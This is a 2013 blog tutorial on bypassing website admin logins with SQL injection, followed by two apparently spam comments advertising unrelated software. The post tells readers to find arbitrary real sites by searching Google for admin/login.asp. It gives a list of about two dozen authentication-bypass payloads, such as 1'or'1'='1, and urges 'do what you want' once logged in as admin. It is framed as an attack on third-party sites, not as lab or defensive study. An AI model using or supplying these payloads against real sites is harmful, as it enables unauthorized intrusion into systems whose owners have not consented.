20 August 2013

Basic SQL Injection with List of all Possible Passwords

sql_img Hi! After long time break, today I came up with an simple tutorial on Basic SQL Injection in which we are trying to gain admin access by hit and trial method- All Possible SQL Injections! Previously I had also written an beautiful post on How to Hack Websites Using Havij. Well A SQL injection injects a code into the MYSQL database which gets passed the site security login. So after getting so much response, I decided to wrote this article and even a child can perform this method. In this, we will take help of Google Search Engine and then find admin login URL’s and lastly inject SQL passwords. That’s it! Please have a look.

Hack Website Admin Account: Basic SQL Injection Attack

1. First of all Google admin/login.asp and do a complete search.

sql injection 2. Now you can see in the above picture, we are looking for the websites that look like this and ends with admin/login.asp

3. Click on any of the websites as you founded above and login with this-

Username : admin

Password : 1'or'1'='1

4. Well done!! Your now logged in as ADMIN Successfully. Hence do what you want.

5. If Password is not working then please try the following-

List of injections:

       1'or'1'='1
       ' or 0=0 --
       " or 0=0 --
       or 0=0 --
       ' or 0=0 #
       " or 0=0 #
       or 0=0 #
       ' or 'x'='x
       " or "x"="x
       ') or ('x'='x
       ' or 1=1--
       " or 1=1--
       or 1=1--
       ' or a=a--
       " or "a"="a
       ') or ('a'='a
       ") or ("a"="a
       hi" or "a"="a
       hi" or 1=1 --
       hi' or 1=1 --
       hi' or 'a'='a
       hi') or ('a'='a
       hi") or ("a"="a

Note- If any website has applied login limits, then this method might gets failed.

All Done! Enjoy Hacking and Must Share!

3 comments:

  1. Every project in InvokeAI feels inspiring and effortless thanks to its robust AI capabilities, intuitive interface, and flexible workflow options, allowing creators to explore new styles, refine concepts, and produce professional-quality art efficiently while enjoying a highly motivating creative environment.

    ReplyDelete
  2. Amazingly BCUninstaller provides a complete solution for uninstalling programs efficiently with advanced scanning capabilities intuitive navigation and reliable functionality allowing users to remove applications safely quickly and thoroughly while maintaining system stability security and ensuring every task is performed effortlessly

    ReplyDelete

Your feedback is always Precious to us.
I will try to answer all the queries as soon as possible.

Regards
karan chauhan